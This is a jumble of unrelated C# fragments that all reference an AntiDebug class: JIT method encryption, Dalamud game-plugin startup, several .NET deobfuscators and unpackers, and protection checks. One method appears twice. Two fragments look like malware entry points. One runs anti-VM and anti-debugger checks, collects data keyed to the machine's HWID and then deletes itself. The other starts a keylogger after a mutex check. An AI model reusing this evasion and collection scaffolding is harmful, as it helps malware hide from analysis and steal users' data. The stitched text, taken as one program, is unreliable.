//delegate preperation & JIT Stack fixes
private unsafe void PreJit()
{
Win32.Print("PreJIT: FindMatchingMethods");
MethodInfo method = typeof(JitEncrypt).GetMethod("FindMethods", BindingFlags.Instance | BindingFlags.NonPublic);
RuntimeHelpers.PrepareMethod(method.MethodHandle);
Win32.Print("PreJIT: ContainsKey");
method = typeof(Dictionary <long, JitMethodBase>).GetMethod("ContainsKey", BindingFlags.Instance | BindingFlags.Public);
RuntimeHelpers.PrepareMethod(method.MethodHandle);
Win32.Print("PreJIT: FindMatchingMethods [Call]");
//--- Note the following requests are required to prevent stack overflow exceptions on some deep .net methods that they call
Data.CorMethodInfo64 methodInfo = new Data.CorMethodInfo64() //--- create fake data structure pointing to our fake method
{
moduleHandle = new IntPtr(int.MaxValue),
methodHandle = new IntPtr(int.MaxValue - 0x06000000)
};
JitMethodBase temp = new JitMethodBase(methodInfo.moduleHandle, int.MaxValue, method, new ClrEncrypted(EncryptionType.aes, false)); //--- define our fake method
JitMethodBase temp2 = new JitMethodBase(methodInfo.moduleHandle, int.MaxValue, method, new MethodHash("fake method hash")); //--- define our fake method
long value = temp.hMODULE.ToInt64() + temp.Token; //--- calculate our fake method's lookup token
EncryptedMethods.Add(value, temp); //--- add our fake method to our dictioanry
HashedMethods.Add(value, temp2);
FindMethods(&methodInfo); // use FindMethods to PreJit the entire chain
EncryptedMethods.Clear(); //--- clear our dictionary of our fake method to prevent issues
HashedMethods.Clear();
if (AntiDebug.DetectDebuggers())
{
Win32.Print("Debugger Present");
SafeCrash.ForceCrash();
}
}
public void Dispose()
{
try {
// this must be done before unloading plugins, or it can cause a race condition
// due to rendering happening on another thread, where a plugin might receive
// a render call after it has been disposed, which can crash if it attempts to
// use any resources that it freed in its own Dispose method
InterfaceManager?.Dispose();
try {
PluginManager.UnloadPlugins();
} catch (Exception ex) {
Log.Error(ex, "Plugin unload failed.");
}
Framework.Dispose();
ClientState.Dispose();
this.unloadSignal.Dispose();
WinSock2.Dispose();
SigScanner.Dispose();
Data.Dispose();
AntiDebug.Dispose();
Log.Debug("Dalamud::Dispose OK!");
} catch (Exception ex) {
Log.Error(ex, "skjdgjjkodsfg");
}
}
//delegate preperation & JIT Stack fixes
private unsafe void PreJit()
{
Win32.Print("PreJIT: FindMatchingMethods");
MethodInfo method = typeof(JitEncrypt).GetMethod("FindMethods", BindingFlags.Instance | BindingFlags.NonPublic);
System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(method.MethodHandle);
Win32.Print("PreJIT: DoesMatch");
method = typeof(JitMethodBase).GetMethod("DoesMatch", BindingFlags.Instance | BindingFlags.Public);
System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(method.MethodHandle);
Win32.Print("PreJIT: FindMatchingMethods [Call]");
//--- Note the following requests are required to prevent stack overflow exceptions on some deep .net methods that they call
Data.CorMethodInfo64 methodInfo = new Data.CorMethodInfo64()
{
moduleHandle = IntPtr.Zero,
methodHandle = IntPtr.Zero
};
FindMethods(&methodInfo);
Win32.Print("PreJIT: DoesMatch [Call]");
JitMethodBase temp = new JitMethodBase(method.Module.GetHMODULE(), method.MetadataToken, method, new ClrEncrypted(EncryptionType.aes, false));
temp.DoesMatch(IntPtr.Zero, 0);
if (AntiDebug.DetectDebuggers())
{
Win32.Print("Debugger Present");
SafeCrash.ForceCrash();
}
}
public unsafe void Enable()
{
PreJit();
//--- TODO: check MD5 of the assembly
if (!_jitHook64.Hook(ClrCompile64))
{
throw new Exception("Hook failed!");
}
AntiDebug.StartForceBreak();
}
private unsafe int ClrCompile64(IntPtr thisPtr, [In] IntPtr corJitInfo,
[In] Data.CorMethodInfo64 *methodInfo, Data.CorJitFlag flags,
[Out] IntPtr nativeEntry, [Out] IntPtr nativeSizeOfCode)
{
JitMethodBase[] compiling_methods = FindMethods(methodInfo);
//IntPtr corJitInfo_vTable = Marshal.ReadIntPtr(corJitInfo);
if (compiling_methods.Length != 0)
{
//detect debuggers
if (AntiDebug.DetectDebuggers())
{
Win32.Print("On Compile - Debugger Present");
SafeCrash.ForceCrash();
}
JitMethodBase method_base = compiling_methods[0];
Win32.Print($"Compiling: {method_base.Method.Name}");
if (compiling_methods.Length == 1)
{
//--- one matching method, HandleCompile we determine what to do
HandleCompile(method_base, methodInfo);
}
else
{
//--- two matching methods, must handle decryption before hashing
foreach (JitMethodBase method in compiling_methods)
{
if (method is EncryptedMethod encrypted)
{
HandleCompile(encrypted, methodInfo);
break;
}
}
foreach (JitMethodBase method in compiling_methods)
{
if (method is HashedMethod hashed)
{
HandleCompile(hashed, methodInfo);
break;
}
}
}
}
return(_jitHook64.OriginalCompileMethod(thisPtr, corJitInfo, methodInfo, flags, nativeEntry, nativeSizeOfCode));
}
static void Main(string[] args)
{
Debug.Assert(args.Length > 0);
ModuleDefMD targetModule = ModuleDefMD.Load(args[0]);
ModuleDefMD runtimeModule = ModuleDefMD.Load("Confuser.Runtime.dll");
ClarifierContext ctx = new ClarifierContext
{
CurrentModule = targetModule,
WriterListener = new MWListener(),
//ILLanguage = il
};
AntiDump antiDump = new AntiDump();
AntiDebug antiDebug = new AntiDebug();
Constants constants = new Constants();
AntiTamper antiTamper = new AntiTamper();
Inliner inliner = new Inliner();
inliner.PerformIdentification(ctx);
inliner.PerformRemoval(ctx);
antiTamper.Initialize();
antiTamper.PerformIdentification(ctx);
antiTamper.PerformRemoval(ctx);
antiDump.Initialize(ctx);
antiDump.PerformIdentification(ctx);
antiDump.PerformRemoval(ctx);
antiDebug.Initialize(ctx);
antiDebug.PerformIdentification(ctx);
antiDebug.PerformRemoval(ctx);
constants.Initialize(ctx);
constants.PerformIdentification(ctx);
constants.PerformRemoval(ctx);
int lastBackslash = args[0].LastIndexOf('\\');
string targetExecutable = args[0].Substring(lastBackslash + 1, args[0].Length - 1 - lastBackslash);
string parentDir = Directory.GetParent(Directory.GetParent(args[0]).FullName).FullName;
parentDir = Path.Combine(parentDir, "Deobfuscated");
string destinationFile = Path.Combine(parentDir, targetExecutable);
targetModule.Write(destinationFile);
return;
}
private static void Main()
{
if (Program.AntiVM)
{
VMcheck.CheckAnti();
}
if (Program.AntiDebugger)
{
Program.< > c__DisplayClass0_0 CS$ < > 8__locals1 = new Program.< > c__DisplayClass0_0();
if (AntiDebug.inDebugger())
{
AntiDebug.badExit();
}
Program.< > c__DisplayClass0_0 CS$ < > 8__locals2 = CS$ < > 8__locals1;
Task[] array = new Task[1];
array[0] = new Task(delegate()
{
AntiDebug.StartAn();
});
CS$ < > 8__locals2.dd = array;
new Thread(delegate()
{
Task[] dd = CS$ < > 8__locals1.dd;
for (int i = 0; i < dd.Length; i++)
{
dd[i].Start();
}
}).Start();
DebugProtect3.HideOSThreads();
}
if (!File.Exists(Help.LocalData + "\\" + Help.HWID))
{
Collection.GetCollection();
}
else if (!File.ReadAllText(Help.LocalData + "\\" + Help.HWID).Contains(Help.HWID + Help.dateLog))
{
Collection.GetCollection();
}
else if (Program.doubleExecute)
{
Collection.GetCollection();
}
else
{
Environment.Exit(0);
}
Clean.selfRemove();
Environment.Exit(0);
}
public static bool Load()
{
//Initialize all features
if (Settings.SystemProcess_CheckParentProcess)
{
AntiDebug.CheckParentProcess();
}
if (SysMutex.CheckMutex() == false)
{
return(false);
}
//UsbSpread usbSpread = new UsbSpread();
//SystemProcess sysProc = new SystemProcess();
Keylogger keylog = new Keylogger();
//MsgBox msgbox = new MsgBox();
return(true);
}
/// <summary>
/// Perform basic checks, method 1
/// Checks are very fast, there is no CPU overhead.
/// </summary>
public static bool PerformChecks()
{
var isProcessRemote = AntiDebug.CheckRemoteDebugger();
var isManagedCodesAttached = AntiDebug.CheckDebuggerManagedPresent();
var isUnManagedCodesAttached = AntiDebug.CheckDebuggerUnmanagedPresent();
var checkDebugPort = AntiDebug.CheckDebugPort();
var checkKernelDebugInformation = AntiDebug.CheckKernelDebugInformation();
var detectEmulation = ProtectionHelper.DetectEmulation();
var detectSandbox = ProtectionHelper.DetectSandbox();
var detectVirtualMachine = ProtectionHelper.DetectVirtualMachine();
var detachFromDebuggerProcess = AntiDebug.DetachFromDebuggerProcess();
WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckRemoteDebugger)}", isProcessRemote);
WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckDebuggerManagedPresent)}", isManagedCodesAttached);
WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckDebuggerUnmanagedPresent)}", isUnManagedCodesAttached);
WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckDebugPort)}", checkDebugPort);
WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckKernelDebugInformation)}", checkKernelDebugInformation);
WriteBooleanResult($"{nameof(ProtectionHelper)}.{nameof(ProtectionHelper.DetectEmulation)}", detectEmulation);
WriteBooleanResult($"{nameof(ProtectionHelper)}.{nameof(ProtectionHelper.DetectSandbox)}", detectSandbox);
WriteBooleanResult($"{nameof(ProtectionHelper)}.{nameof(ProtectionHelper.DetectVirtualMachine)}", detectVirtualMachine);
WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.DetachFromDebuggerProcess)}", detachFromDebuggerProcess);
AntiDebug.HideOsThreads();
Scanner.ScanAndKill();
if (isProcessRemote || isManagedCodesAttached ||
isUnManagedCodesAttached || checkDebugPort ||
checkKernelDebugInformation || detectEmulation ||
detectSandbox || detectVirtualMachine)
{
ProtectionHelper.FreezeMouse();
ProtectionHelper.ShowCmd("Protector", "Active debugger found!", "C");
return(true);
}
return(false);
}
/// <summary>
/// Start and initialize Dalamud subsystems.
/// </summary>
public void Start()
{
try
{
this.Configuration = DalamudConfiguration.Load(this.StartInfo.ConfigurationPath);
// Initialize the process information.
this.TargetModule = Process.GetCurrentProcess().MainModule;
this.SigScanner = new SigScanner(this.TargetModule, true);
Log.Information("[START] Scanner OK!");
this.AntiDebug = new AntiDebug(this.SigScanner);
#if DEBUG
AntiDebug.Enable();
#endif
Log.Information("[START] AntiDebug OK!");
// Initialize game subsystem
this.Framework = new Framework(this.SigScanner, this);
Log.Information("[START] Framework OK!");
this.WinSock2 = new WinSockHandlers();
Log.Information("[START] WinSock OK!");
this.NetworkHandlers = new NetworkHandlers(this, this.StartInfo.OptOutMbCollection);
Log.Information("[START] NH OK!");
this.ClientState = new ClientState(this, this.StartInfo, this.SigScanner);
Log.Information("[START] CS OK!");
this.LocalizationManager = new Localization(Path.Combine(this.AssetDirectory.FullName, "UIRes", "loc", "dalamud"), "dalamud_");
if (!string.IsNullOrEmpty(this.Configuration.LanguageOverride))
{
this.LocalizationManager.SetupWithLangCode(this.Configuration.LanguageOverride);
}
else
{
this.LocalizationManager.SetupWithUiCulture();
}
Log.Information("[START] LOC OK!");
this.PluginRepository =
new PluginRepository(this, this.StartInfo.PluginDirectory, this.StartInfo.GameVersion);
Log.Information("[START] PREPO OK!");
var isInterfaceLoaded = false;
if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_INTERFACE") ?? "false"))
{
try
{
this.InterfaceManager = new InterfaceManager(this, this.SigScanner);
this.InterfaceManager.Enable();
isInterfaceLoaded = true;
Log.Information("[START] IM OK!");
this.InterfaceManager.WaitForFontRebuild();
}
catch (Exception e)
{
Log.Information(e, "Could not init interface.");
}
}
this.Data = new DataManager(this.StartInfo.Language, this.InterfaceManager);
try
{
this.Data.Initialize(this.AssetDirectory.FullName);
}
catch (Exception e)
{
Log.Error(e, "Could not initialize DataManager.");
this.Unload();
return;
}
Log.Information("[START] Data OK!");
this.SeStringManager = new SeStringManager(this.Data);
Log.Information("[START] SeString OK!");
// Initialize managers. Basically handlers for the logic
this.CommandManager = new CommandManager(this, this.StartInfo.Language);
this.DalamudCommands = new DalamudCommands(this);
this.DalamudCommands.SetupCommands();
Log.Information("[START] CM OK!");
this.ChatHandlers = new ChatHandlers(this);
Log.Information("[START] CH OK!");
if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_PLUGINS") ?? "false"))
{
try
{
this.PluginRepository.CleanupPlugins();
Log.Information("[START] PRC OK!");
this.PluginManager = new PluginManager(
this,
this.StartInfo.PluginDirectory,
this.StartInfo.DefaultPluginDirectory);
this.PluginManager.LoadPlugins();
Log.Information("[START] PM OK!");
}
catch (Exception ex)
{
Log.Error(ex, "Plugin load failed.");
}
}
this.Framework.Enable();
Log.Information("[START] Framework ENABLE!");
this.ClientState.Enable();
Log.Information("[START] CS ENABLE!");
this.DalamudUi = new DalamudInterface(this);
this.InterfaceManager.OnDraw += this.DalamudUi.Draw;
Log.Information("[START] DUI OK!");
this.IsReady = true;
Troubleshooting.LogTroubleshooting(this, isInterfaceLoaded);
Log.Information("Dalamud is ready.");
}
catch (Exception ex)
{
Log.Error(ex, "Dalamud::Start() failed.");
this.Unload();
}
}
public Dalamud(DalamudStartInfo info, LoggingLevelSwitch loggingLevelSwitch)
{
this.StartInfo = info;
this.loggingLevelSwitch = loggingLevelSwitch;
this.Configuration = DalamudConfiguration.Load(info.ConfigurationPath);
this.baseDirectory = info.WorkingDirectory;
this.unloadSignal = new ManualResetEvent(false);
// Initialize the process information.
this.targetModule = Process.GetCurrentProcess().MainModule;
this.SigScanner = new SigScanner(this.targetModule, true);
// Initialize game subsystem
this.Framework = new Framework(this.SigScanner, this);
this.WinSock2 = new WinSockHandlers();
NetworkHandlers = new NetworkHandlers(this, this.Configuration.OptOutMbCollection);
this.ClientState = new ClientState(this, info, this.SigScanner);
Task.Run(async() => {
try {
var res = await AssetManager.EnsureAssets(this.baseDirectory);
if (!res)
{
Log.Error("One or more assets failed to download.");
Unload();
return;
}
} catch (Exception e) {
Log.Error(e, "Error in asset task.");
Unload();
return;
}
this.LocalizationManager = new Localization(this.StartInfo.WorkingDirectory);
if (!string.IsNullOrEmpty(this.Configuration.LanguageOverride))
{
this.LocalizationManager.SetupWithLangCode(this.Configuration.LanguageOverride);
}
else
{
this.LocalizationManager.SetupWithUiCulture();
}
PluginRepository = new PluginRepository(this, this.StartInfo.PluginDirectory, this.StartInfo.GameVersion);
var isInterfaceLoaded = false;
if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_INTERFACE") ?? "false"))
{
try
{
InterfaceManager = new InterfaceManager(this, this.SigScanner);
InterfaceManager.OnDraw += BuildDalamudUi;
InterfaceManager.Enable();
isInterfaceLoaded = true;
}
catch (Exception e)
{
Log.Information(e, "Could not init interface.");
}
}
Data = new DataManager(this.StartInfo.Language);
try {
await Data.Initialize(this.baseDirectory);
} catch (Exception e) {
Log.Error(e, "Could not initialize DataManager.");
Unload();
return;
}
SeStringManager = new SeStringManager(Data);
#if DEBUG
AntiDebug = new AntiDebug(this.SigScanner);
AntiDebug.Enable();
#endif
// Initialize managers. Basically handlers for the logic
CommandManager = new CommandManager(this, info.Language);
SetupCommands();
ChatHandlers = new ChatHandlers(this);
if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_PLUGINS") ?? "false"))
{
try
{
PluginRepository.CleanupPlugins();
PluginManager = new PluginManager(this, this.StartInfo.PluginDirectory, this.StartInfo.DefaultPluginDirectory);
PluginManager.LoadPlugins();
}
catch (Exception ex)
{
Log.Error(ex, "Plugin load failed.");
}
}
this.Framework.Enable();
this.ClientState.Enable();
IsReady = true;
Troubleshooting.LogTroubleshooting(this, isInterfaceLoaded);
});
}
private void BuildDalamudUi()
{
if (!this.isImguiDrawDevMenu && !ClientState.Condition.Any())
{
ImGui.PushStyleColor(ImGuiCol.Button, new Vector4(0, 0, 0, 0));
ImGui.PushStyleColor(ImGuiCol.ButtonActive, new Vector4(0, 0, 0, 0));
ImGui.PushStyleColor(ImGuiCol.ButtonHovered, new Vector4(0, 0, 0, 0));
ImGui.PushStyleColor(ImGuiCol.Text, new Vector4(0, 0, 0, 1));
ImGui.PushStyleColor(ImGuiCol.TextSelectedBg, new Vector4(0, 0, 0, 1));
ImGui.PushStyleColor(ImGuiCol.Border, new Vector4(0, 0, 0, 1));
ImGui.PushStyleColor(ImGuiCol.BorderShadow, new Vector4(0, 0, 0, 1));
ImGui.PushStyleColor(ImGuiCol.WindowBg, new Vector4(0, 0, 0, 1));
ImGui.SetNextWindowPos(new Vector2(0, 0), ImGuiCond.Always);
ImGui.SetNextWindowBgAlpha(1);
if (ImGui.Begin("DevMenu Opener", ImGuiWindowFlags.AlwaysAutoResize | ImGuiWindowFlags.NoBackground | ImGuiWindowFlags.NoDecoration | ImGuiWindowFlags.NoMove | ImGuiWindowFlags.NoScrollbar | ImGuiWindowFlags.NoResize | ImGuiWindowFlags.NoSavedSettings))
{
if (ImGui.Button("###devMenuOpener", new Vector2(40, 25)))
{
this.isImguiDrawDevMenu = true;
}
ImGui.End();
}
ImGui.PopStyleColor(8);
}
if (this.isImguiDrawDevMenu)
{
if (ImGui.BeginMainMenuBar())
{
if (ImGui.BeginMenu("Dalamud"))
{
ImGui.MenuItem("Draw Dalamud dev menu", "", ref this.isImguiDrawDevMenu);
ImGui.Separator();
if (ImGui.MenuItem("Open Log window"))
{
this.logWindow = new DalamudLogWindow(CommandManager);
this.isImguiDrawLogWindow = true;
}
if (ImGui.BeginMenu("Set log level..."))
{
foreach (var logLevel in Enum.GetValues(typeof(LogEventLevel)).Cast <LogEventLevel>())
{
if (ImGui.MenuItem(logLevel + "##logLevelSwitch", "", this.loggingLevelSwitch.MinimumLevel == logLevel))
{
this.loggingLevelSwitch.MinimumLevel = logLevel;
}
}
ImGui.EndMenu();
}
if (AntiDebug == null && ImGui.MenuItem("Enable AntiDebug"))
{
AntiDebug = new AntiDebug(this.SigScanner);
AntiDebug.Enable();
}
ImGui.Separator();
if (ImGui.MenuItem("Open Data window"))
{
this.dataWindow = new DalamudDataWindow(this);
this.isImguiDrawDataWindow = true;
}
if (ImGui.MenuItem("Open Credits window"))
{
OnOpenCreditsCommand(null, null);
}
if (ImGui.MenuItem("Open Settings window"))
{
OnOpenSettingsCommand(null, null);
}
if (ImGui.MenuItem("Open Changelog window"))
{
OpenChangelog();
}
ImGui.MenuItem("Draw ImGui demo", "", ref this.isImguiDrawDemoWindow);
if (ImGui.MenuItem("Dump ImGui info"))
{
OnDebugImInfoCommand(null, null);
}
ImGui.Separator();
if (ImGui.MenuItem("Unload Dalamud"))
{
Unload();
}
if (ImGui.MenuItem("Kill game"))
{
Process.GetCurrentProcess().Kill();
}
if (ImGui.MenuItem("Cause AccessViolation"))
{
var a = Marshal.ReadByte(IntPtr.Zero);
}
ImGui.Separator();
ImGui.MenuItem(Util.AssemblyVersion, false);
ImGui.MenuItem(this.StartInfo.GameVersion, false);
ImGui.EndMenu();
}
if (ImGui.BeginMenu("Game"))
{
if (ImGui.MenuItem("Replace ExceptionHandler"))
{
ReplaceExceptionHandler();
}
ImGui.EndMenu();
}
if (ImGui.BeginMenu("Plugins"))
{
if (ImGui.MenuItem("Open Plugin installer"))
{
this.pluginWindow = new PluginInstallerWindow(this, this.StartInfo.GameVersion);
this.isImguiDrawPluginWindow = true;
}
ImGui.Separator();
if (ImGui.MenuItem("Open Plugin Stats"))
{
if (!this.isImguiDrawPluginStatWindow)
{
this.pluginStatWindow = new DalamudPluginStatWindow(this.PluginManager);
this.isImguiDrawPluginStatWindow = true;
}
}
if (ImGui.MenuItem("Print plugin info"))
{
foreach (var plugin in this.PluginManager.Plugins)
{
// TODO: some more here, state maybe?
Log.Information($"{plugin.Plugin.Name}");
}
}
if (ImGui.MenuItem("Reload plugins"))
{
OnPluginReloadCommand(string.Empty, string.Empty);
}
ImGui.Separator();
ImGui.MenuItem("API Level:" + PluginManager.DALAMUD_API_LEVEL, false);
ImGui.MenuItem("Loaded plugins:" + PluginManager?.Plugins.Count, false);
ImGui.EndMenu();
}
if (ImGui.BeginMenu("Localization"))
{
if (ImGui.MenuItem("Export localizable"))
{
Loc.ExportLocalizable();
}
if (ImGui.BeginMenu("Load language..."))
{
if (ImGui.MenuItem("From Fallbacks"))
{
Loc.SetupWithFallbacks();
}
if (ImGui.MenuItem("From UICulture"))
{
this.LocalizationManager.SetupWithUiCulture();
}
foreach (var applicableLangCode in Localization.ApplicableLangCodes)
{
if (ImGui.MenuItem($"Applicable: {applicableLangCode}"))
{
this.LocalizationManager.SetupWithLangCode(applicableLangCode);
}
}
ImGui.EndMenu();
}
ImGui.EndMenu();
}
if (this.Framework.Gui.GameUiHidden)
{
ImGui.BeginMenu("UI is hidden...", false);
}
ImGui.EndMainMenuBar();
}
}
if (this.Framework.Gui.GameUiHidden)
{
return;
}
if (this.isImguiDrawLogWindow)
{
this.isImguiDrawLogWindow = this.logWindow != null && this.logWindow.Draw();
if (this.isImguiDrawLogWindow == false)
{
this.logWindow?.Dispose();
this.logWindow = null;
}
}
if (this.isImguiDrawDataWindow)
{
this.isImguiDrawDataWindow = this.dataWindow != null && this.dataWindow.Draw();
}
if (this.isImguiDrawPluginWindow)
{
this.isImguiDrawPluginWindow = this.pluginWindow != null && this.pluginWindow.Draw();
if (!this.isImguiDrawPluginWindow)
{
this.pluginWindow = null;
}
}
if (this.isImguiDrawCreditsWindow)
{
this.isImguiDrawCreditsWindow = this.creditsWindow != null && this.creditsWindow.Draw();
if (this.isImguiDrawCreditsWindow == false)
{
this.creditsWindow?.Dispose();
this.creditsWindow = null;
}
}
if (this.isImguiDrawSettingsWindow)
{
this.isImguiDrawSettingsWindow = this.settingsWindow != null && this.settingsWindow.Draw();
}
if (this.isImguiDrawDemoWindow)
{
ImGui.ShowDemoWindow();
}
if (this.isImguiDrawPluginStatWindow)
{
this.isImguiDrawPluginStatWindow = this.pluginStatWindow != null && this.pluginStatWindow.Draw();
if (!this.isImguiDrawPluginStatWindow)
{
this.pluginStatWindow?.Dispose();
this.pluginStatWindow = null;
}
}
if (this.isImguiDrawChangelogWindow)
{
this.isImguiDrawChangelogWindow = this.changelogWindow != null && this.changelogWindow.Draw();
}
}
static void Main(string[] args)
{
Console.Title = "DeConfuser - The De-Obfuscator for confuser v1.6";
Console.WriteLine("Copyright © DragonHunter - 2012");
Console.WriteLine("This deobfuscator might not work at every confused assembly, still BETA");
Console.WriteLine("Checkout this project at http://deconfuser.codeplex.com");
Console.WriteLine("Thanks also to Mono.Cecil there was no DeConfuser without Mono.Cecil");
Console.WriteLine("This version of Mono.Cecil is modded by DragonHunter to do some evil shit");
//hardcoded path atm...
string inputPath = @"H:\DeConfuser\ConfuseMe\bin\Debug\confused\ConfuseMe.exe";
string outputPath = @"H:\DeConfuser\ConfuseMe\bin\Debug\confused\ConfuseMe_cleaned.exe";
//load assembly
AssemblyDefinition asm = AssemblyFactory.GetAssembly(inputPath);
#region Anti-Debug remover
AntiDebug debug = new AntiDebug();
TypeDefinition AntiType = null;
MethodDefinition AntiMethod = null;
Console.WriteLine("-------------------------------------------------------");
if (debug.FindAntiDebug(asm, ref AntiType, ref AntiMethod))
{
Console.WriteLine("[Anti-Debugger] Anti-Debugger detected, removing...");
debug.RemoveAntiDebug(asm, AntiType, AntiMethod);
Console.WriteLine("[Anti-Debugger] Removed anti-debugger");
}
else
{
Console.WriteLine("This assembly is not protected with anti-debugging");
}
Console.WriteLine("-------------------------------------------------------");
#endregion
#region String Decryptor
StringDecrypter decrypter = new StringDecrypter();
TypeDefinition DecryptType = null;
MethodDefinition DecryptMethod = null;
if (decrypter.FindMethod(asm, ref DecryptType, ref DecryptMethod))
{
Console.WriteLine("[String Decryptor] Found string decryptor, decrypting strings...");
byte[] StringData = decrypter.GetStringResource(asm, inputPath, DecryptMethod);
decrypter.DecryptAllStrings(asm, DecryptMethod, StringData);
decrypter.RemoveDecryptMethod(asm, DecryptType, DecryptMethod);
Console.WriteLine("[String Decryptor] Removed the decrypt method");
}
else
{
Console.WriteLine("This assembly is not protected with encrypted strings");
}
Console.WriteLine("-------------------------------------------------------");
#endregion
#region Anti-Dump remover
AntiDump dump = new AntiDump();
TypeDefinition AntiDumpType = null;
MethodDefinition AntiDumpMethod = null;
if (dump.FindAntiDump(asm, ref AntiDumpType, ref AntiDumpMethod))
{
Console.WriteLine("[Anti-Dump] Anti-Dump detected, removing...");
dump.RemoveAntiDump(asm, AntiDumpType, AntiDumpMethod);
Console.WriteLine("[Anti-Dump] Removed anti-dump");
}
else
{
Console.WriteLine("This assembly is not protected with anti-dump");
}
Console.WriteLine("-------------------------------------------------------");
#endregion
#region Resource Decryptor
ResourceDecrypter resourceDecrypter = new ResourceDecrypter();
TypeDefinition ResourceType = null;
MethodDefinition ResourceMethod = null;
if (resourceDecrypter.FindMethod(asm, ref ResourceType, ref ResourceMethod))
{
Console.WriteLine("[Resource-Decrypter] Resource-Decrypter, decrypting");
resourceDecrypter.DecryptAllResources(asm, inputPath, ResourceType, ResourceMethod);
}
else
{
Console.WriteLine("This assembly is not protected with encrypted resources");
}
Console.WriteLine("-------------------------------------------------------");
#endregion
AssemblyFactory.SaveAssembly(asm, outputPath);
Console.WriteLine("File dumped to \"" + outputPath + "\"");
Console.WriteLine("Thanks for using DeConfuser :)");
Process.GetCurrentProcess().WaitForExit();
}
public void Start()
{
Configuration = DalamudConfiguration.Load(StartInfo.ConfigurationPath);
// Initialize the process information.
TargetModule = Process.GetCurrentProcess().MainModule;
SigScanner = new SigScanner(TargetModule, true);
AntiDebug = new AntiDebug(SigScanner);
#if DEBUG
AntiDebug.Enable();
#endif
// Initialize game subsystem
Framework = new Framework(SigScanner, this);
WinSock2 = new WinSockHandlers();
NetworkHandlers = new NetworkHandlers(this, StartInfo.OptOutMbCollection);
ClientState = new ClientState(this, StartInfo, SigScanner);
LocalizationManager = new Localization(AssetDirectory.FullName);
if (!string.IsNullOrEmpty(Configuration.LanguageOverride))
{
LocalizationManager.SetupWithLangCode(Configuration.LanguageOverride);
}
else
{
LocalizationManager.SetupWithUiCulture();
}
PluginRepository = new PluginRepository(this, StartInfo.PluginDirectory, StartInfo.GameVersion);
DalamudUi = new DalamudInterface(this);
var isInterfaceLoaded = false;
if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_INTERFACE") ?? "false"))
{
try {
InterfaceManager = new InterfaceManager(this, SigScanner);
InterfaceManager.OnDraw += DalamudUi.Draw;
InterfaceManager.Enable();
isInterfaceLoaded = true;
} catch (Exception e) {
Log.Information(e, "Could not init interface.");
}
}
Data = new DataManager(StartInfo.Language);
try {
Data.Initialize(AssetDirectory.FullName);
} catch (Exception e) {
Log.Error(e, "Could not initialize DataManager.");
Unload();
return;
}
SeStringManager = new SeStringManager(Data);
// Initialize managers. Basically handlers for the logic
CommandManager = new CommandManager(this, StartInfo.Language);
DalamudCommands = new DalamudCommands(this);
DalamudCommands.SetupCommands();
ChatHandlers = new ChatHandlers(this);
if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_PLUGINS") ?? "false"))
{
try
{
PluginRepository.CleanupPlugins();
PluginManager =
new PluginManager(this, StartInfo.PluginDirectory, StartInfo.DefaultPluginDirectory);
PluginManager.LoadPlugins();
}
catch (Exception ex)
{
Log.Error(ex, "Plugin load failed.");
}
}
Framework.Enable();
ClientState.Enable();
IsReady = true;
Troubleshooting.LogTroubleshooting(this, isInterfaceLoaded);
Log.Information("Dalamud is ready.");
}
static void Main(string[] args)
{
#region Initialize
Console.Title = "Rzy Protector V2 Unpacker - by illuZion#9999";
WriteTitle();
if (args.Length != 1)
{
Write("Please, drag 'n' drop the file to unpack!", Type.Error);
Leave();
}
string directory = args[0];
try
{
Module = ModuleDefMD.Load(directory);
}
catch
{
Write("Not a .NET Assembly...", Type.Error);
Leave();
}
#endregion Initialize
#region Unpack
HideMethods.Execute(Module);
CallToCalli.Execute(Module);
EmptyTypes.Execute(Module);
Maths(Module);
LocalToField.Execute(Module);
Constants.Execute(Module);
Maths(Module);
StringProtection.Execute(Module);
FakeObfuscator.Execute(Module);
AntiIlDasm.Execute(Module);
AntiDe4dot.Execute(Module);
AntiDnspy.Execute(Module);
AntiVm.Execute(Module);
AntiDebug.Execute(Module);
AntiDump.Execute(Module);
RemoveNops.Execute(Module);
#endregion Unpack
#region Save the file
Write("Saving the unpacked file...");
string text = Path.GetDirectoryName(directory);
if (text == null)
{
Leave();
}
// We can disable the possible null exception as the Leave method closes the program (but Resharper does not detect it).
// ReSharper disable once PossibleNullReferenceException
text += !text.EndsWith("\\") ? "\\" : null;
string filename =
$"{text}{Path.GetFileNameWithoutExtension(directory)}-Unpacked{Path.GetExtension(directory)}";
var writerOptions = new ModuleWriterOptions(Module);
writerOptions.MetadataOptions.Flags |= MetadataFlags.PreserveAll;
writerOptions.Logger = DummyLogger.NoThrowInstance;
var nativewriterOptions = new NativeModuleWriterOptions(Module, true);
nativewriterOptions.MetadataOptions.Flags |= MetadataFlags.PreserveAll;
nativewriterOptions.Logger = DummyLogger.NoThrowInstance;
if (Module.IsILOnly)
{
Module.Write(filename, writerOptions);
}
else
{
Module.NativeWrite(filename, nativewriterOptions);
}
Write($"File saved at: {filename}", Type.Success);
Leave();
#endregion Save the file
}
